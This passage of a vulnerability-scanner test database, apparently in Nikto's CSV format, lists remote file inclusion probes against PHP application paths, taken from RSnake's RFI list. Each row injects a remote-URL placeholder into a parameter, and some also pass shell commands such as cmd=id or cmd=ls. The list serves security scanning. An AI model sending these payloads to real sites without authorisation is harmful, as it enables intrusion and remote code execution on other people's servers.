Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005132","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?pager=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005133","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?pagina=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005134","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?path_to_folder=@RFIURL?cmd=id","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005135","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?pg=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005136","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?pg=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005137","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005138","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?plugin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005139","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?principal=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005140","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?proMod=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005141","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?proMod=@RFIURL?cmd","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005142","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?project=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005143","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?repinc=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005144","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?root_prefix=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005145","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?root_prefix=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005146","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?section=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005147","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?site=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005148","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?site_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005149","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?styl[top]=@RFIURL??","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005150","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?template=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005151","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?templates_dir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005152","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?theme=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005153","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?themepath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005154","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?themesdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005155","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?this_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005156","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?txt=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005157","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?up=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005158","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?url=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005159","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?w=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005160","https://gist.github.com/mubix/5d269c686584875015a2","c","/index.php?way=@RFIURL??????????????","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005161","https://gist.github.com/mubix/5d269c686584875015a2","c","/index1.php?=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005162","https://gist.github.com/mubix/5d269c686584875015a2","c","/index1.php?inc=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005163","https://gist.github.com/mubix/5d269c686584875015a2","c","/index1.php?inhalt=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005164","https://gist.github.com/mubix/5d269c686584875015a2","c","/index2.php?=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005165","https://gist.github.com/mubix/5d269c686584875015a2","c","/index2.php?content=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005166","https://gist.github.com/mubix/5d269c686584875015a2","c","/index2.php?s=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005167","https://gist.github.com/mubix/5d269c686584875015a2","c","/index2.php?x=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005168","https://gist.github.com/mubix/5d269c686584875015a2","c","/indexinfo.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005169","https://gist.github.com/mubix/5d269c686584875015a2","c","/indexk.php?lib_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005170","https://gist.github.com/mubix/5d269c686584875015a2","c","/info.php?file=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005171","https://gist.github.com/mubix/5d269c686584875015a2","c","/inhalt.php?dateien[news]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005172","https://gist.github.com/mubix/5d269c686584875015a2","c","/init.php?API_HOME_DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005173","https://gist.github.com/mubix/5d269c686584875015a2","c","/init.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005174","https://gist.github.com/mubix/5d269c686584875015a2","c","/initialize.php?hmail_config[includepath]=@RFIURL&cmd=dir","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005175","https://gist.github.com/mubix/5d269c686584875015a2","c","/initiate.php?abs_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005176","https://gist.github.com/mubix/5d269c686584875015a2","c","/install.php?_NE[AbsPath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005177","https://gist.github.com/mubix/5d269c686584875015a2","c","/install.php?install_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005178","https://gist.github.com/mubix/5d269c686584875015a2","c","/install/config.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005179","https://gist.github.com/mubix/5d269c686584875015a2","c","/install/di.php?pathtoserverdata=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005180","https://gist.github.com/mubix/5d269c686584875015a2","c","/install/index.php?content_php=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005181","https://gist.github.com/mubix/5d269c686584875015a2","c","/install/install3.php?database=none&cabsolute_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005182","https://gist.github.com/mubix/5d269c686584875015a2","c","/integration/shortstat/configuration.php?SPL_CFG[dirroot]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005183","https://gist.github.com/mubix/5d269c686584875015a2","c","/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005184","https://gist.github.com/mubix/5d269c686584875015a2","c","/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005185","https://gist.github.com/mubix/5d269c686584875015a2","c","/interface/billing/billing_process.php?srcdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005186","https://gist.github.com/mubix/5d269c686584875015a2","c","/interface/editors/-custom.php?bField[bf_data]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005187","https://gist.github.com/mubix/5d269c686584875015a2","c","/interface/editors/custom.php?bField[bf_data]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005188","https://gist.github.com/mubix/5d269c686584875015a2","c","/interface/new/new_patient_save.php?srcdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005189","https://gist.github.com/mubix/5d269c686584875015a2","c","/intern/admin/?rootdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005190","https://gist.github.com/mubix/5d269c686584875015a2","c","/intern/admin/other/backup.php?admin=1&rootdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005191","https://gist.github.com/mubix/5d269c686584875015a2","c","/intern/clan/member_add.php?rootdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005192","https://gist.github.com/mubix/5d269c686584875015a2","c","/intern/config/forum.php?rootdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005193","https://gist.github.com/mubix/5d269c686584875015a2","c","/intern/config/key_2.php?rootdir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005194","https://gist.github.com/mubix/5d269c686584875015a2","c","/ip.inc.php?type=1&cgipath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005195","https://gist.github.com/mubix/5d269c686584875015a2","c","/ipeer_site/?page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005196","https://gist.github.com/mubix/5d269c686584875015a2","c","/joinus.php?vwar_root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005197","https://gist.github.com/mubix/5d269c686584875015a2","c","/joinus.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005198","https://gist.github.com/mubix/5d269c686584875015a2","c","/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005199","https://gist.github.com/mubix/5d269c686584875015a2","c","/joomla_path/components/com_articles.php?absolute_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005200","https://gist.github.com/mubix/5d269c686584875015a2","c","/js/bbcodepress/bbcode-form.php?BBCODE_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005201","https://gist.github.com/mubix/5d269c686584875015a2","c","/js/wptable-tinymce.php?ABSPATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005202","https://gist.github.com/mubix/5d269c686584875015a2","c","/jscript.php?my_ms[root]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005203","https://gist.github.com/mubix/5d269c686584875015a2","c","/kernel/class/ixpts.class.php?IXP_ROOT_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005204","https://gist.github.com/mubix/5d269c686584875015a2","c","/kernel/loadkernel.php?installPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005205","https://gist.github.com/mubix/5d269c686584875015a2","c","/kmitaadmin/kmitam/htmlcode.php?file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005206","https://gist.github.com/mubix/5d269c686584875015a2","c","/kmitaadmin/kmitat/htmlcode.php?file=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005207","https://gist.github.com/mubix/5d269c686584875015a2","c","/ktmlpro/includes/ktedit/toolbar.php?dirDepth=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005208","https://gist.github.com/mubix/5d269c686584875015a2","c","/lang/leslangues.php?fichier=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005209","https://gist.github.com/mubix/5d269c686584875015a2","c","/lang_english/lang_main_album.php?phpbb_root_path=@RFIURL?a=","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005210","https://gist.github.com/mubix/5d269c686584875015a2","c","/language/lang_english/lang_activity.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005211","https://gist.github.com/mubix/5d269c686584875015a2","c","/language/lang_english/lang_admin_album.php?phpbb_root_path=@RFIURL?a=","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005212","https://gist.github.com/mubix/5d269c686584875015a2","c","/language/lang_german/lang_admin_album.php?phpbb_root_path=@RFIURL?a=","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005213","https://gist.github.com/mubix/5d269c686584875015a2","c","/language/lang_german/lang_main_album.php?phpbb_root_path=@RFIURL?a=","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005214","https://gist.github.com/mubix/5d269c686584875015a2","c","/latestposts.php?forumspath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005215","https://gist.github.com/mubix/5d269c686584875015a2","c","/latex.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005216","https://gist.github.com/mubix/5d269c686584875015a2","c","/layout/default/params.php?gConf[dir][layouts]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005217","https://gist.github.com/mubix/5d269c686584875015a2","c","/ldap/authldap.php?includePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005218","https://gist.github.com/mubix/5d269c686584875015a2","c","/learnPath/include/scormExport.inc.php?includePath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005219","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib.editor.inc.php?sys_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005220","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/Loggix/Module/Calendar.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005221","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/Loggix/Module/Comment.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005222","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/Loggix/Module/Rss.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005223","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/Loggix/Module/Trackback.php?pathToIndex=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005224","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/action/rss.php?lib=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005225","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/activeutil.php?set[include_path]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005226","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/addressbook.php?GLOBALS[basedir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005227","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/armygame.php?libpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005228","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/authuser.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005229","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/base.php?BaseCfg[BaseDir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005230","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/connect.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005231","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/connected_users.lib.php3?ChatPath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005232","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/connected_users.lib.php3?ChatPath=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005233","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/db/mysql.class.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005234","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/db/postgres.class.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005235","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/functions.php?DOC_ROOT=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005236","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/googlesearch/GoogleSearch.php?APP[path][lib]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005237","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/header.php?DOC_ROOT=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005238","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/language.php?_LIB_DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005239","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/live_status.lib.php?ROOT=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005240","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/misc.php?root=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005241","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/nl/nl.php?g_strRootDir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005242","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/obj/collection.class.php?GLOBALS[application][app_root]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005243","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/obj/content_image.class.php?GLOBALS[application][app_root]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005244","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005245","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/pcltrace.lib.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005246","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/rs.php?rootpath=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005247","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/selectlang.php?BBC_LANGUAGE_PATH=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005248","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/smarty/SmartyFU.class.php?system[smarty][dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005249","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/smarty/SmartyFU.class.php?system[smarty][dir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005250","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/static/header.php?set_menu=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005251","https://gist.github.com/mubix/5d269c686584875015a2","c","/lib/tpl.inc.php?conf[classpath]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005252","https://gist.github.com/mubix/5d269c686584875015a2","c","/libraries/comment/postComment.php?path[cb]=@RFIURL?a=","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005253","https://gist.github.com/mubix/5d269c686584875015a2","c","/libraries/database.php?path=@RFIURL???","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005254","https://gist.github.com/mubix/5d269c686584875015a2","c","/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005255","https://gist.github.com/mubix/5d269c686584875015a2","c","/libraries/pcl/pcltar.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005256","https://gist.github.com/mubix/5d269c686584875015a2","c","/library/authorize.php?login_form=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005257","https://gist.github.com/mubix/5d269c686584875015a2","c","/library/translation.inc.php?GLOBALS[srcdir]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005258","https://gist.github.com/mubix/5d269c686584875015a2","c","/libs/db.php?path_local=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005259","https://gist.github.com/mubix/5d269c686584875015a2","c","/libs/ftp.php?path_local=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005260","https://gist.github.com/mubix/5d269c686584875015a2","c","/libs/lom.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005261","https://gist.github.com/mubix/5d269c686584875015a2","c","/libsecure.php?abs_path=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005262","https://gist.github.com/mubix/5d269c686584875015a2","c","/license.php?CONFIG[MWCHAT_Libs]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005263","https://gist.github.com/mubix/5d269c686584875015a2","c","/link_main.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005264","https://gist.github.com/mubix/5d269c686584875015a2","c","/linkadmin.php?page=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005265","https://gist.github.com/mubix/5d269c686584875015a2","c","/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005266","https://gist.github.com/mubix/5d269c686584875015a2","c","/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005267","https://gist.github.com/mubix/5d269c686584875015a2","c","/list.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005268","https://gist.github.com/mubix/5d269c686584875015a2","c","/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005269","https://gist.github.com/mubix/5d269c686584875015a2","c","/lms_path/modules/welcome.php?_LIB_DIR=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005270","https://gist.github.com/mubix/5d269c686584875015a2","c","/load_lang.php?_SERWEB[configdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005271","https://gist.github.com/mubix/5d269c686584875015a2","c","/load_lang.php?_SERWEB[serwebdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005272","https://gist.github.com/mubix/5d269c686584875015a2","c","/load_phplib.php?_PHPLIB[libdir]=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005273","https://gist.github.com/mubix/5d269c686584875015a2","c","/loader.php?GLOBALS=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005274","https://gist.github.com/mubix/5d269c686584875015a2","c","/local/lib/lcUser.php?LIBDIR=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005275","https://gist.github.com/mubix/5d269c686584875015a2","c","/log.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005276","https://gist.github.com/mubix/5d269c686584875015a2","c","/login.php3?cl_headers=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005277","https://gist.github.com/mubix/5d269c686584875015a2","c","/login.php?base_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005278","https://gist.github.com/mubix/5d269c686584875015a2","c","/login.php?blog_theme=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005279","https://gist.github.com/mubix/5d269c686584875015a2","c","/login.php?langfile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005280","https://gist.github.com/mubix/5d269c686584875015a2","c","/login.php?pachtofile=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005281","https://gist.github.com/mubix/5d269c686584875015a2","c","/login.php?srcdir=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005282","https://gist.github.com/mubix/5d269c686584875015a2","c","/login.php?value=@RFIURL??","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005283","https://gist.github.com/mubix/5d269c686584875015a2","c","/lovecms/install/index.php?step=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005284","https://gist.github.com/mubix/5d269c686584875015a2","c","/m2f/m2f_cron.php?m2f_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005285","https://gist.github.com/mubix/5d269c686584875015a2","c","/m2f/m2f_forum.php?m2f_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005286","https://gist.github.com/mubix/5d269c686584875015a2","c","/m2f/m2f_mailinglist.php?m2f_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "005287","https://gist.github.com/mubix/5d269c686584875015a2","c","/m2f/m2f_phpbb204.php?m2f_root_path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" 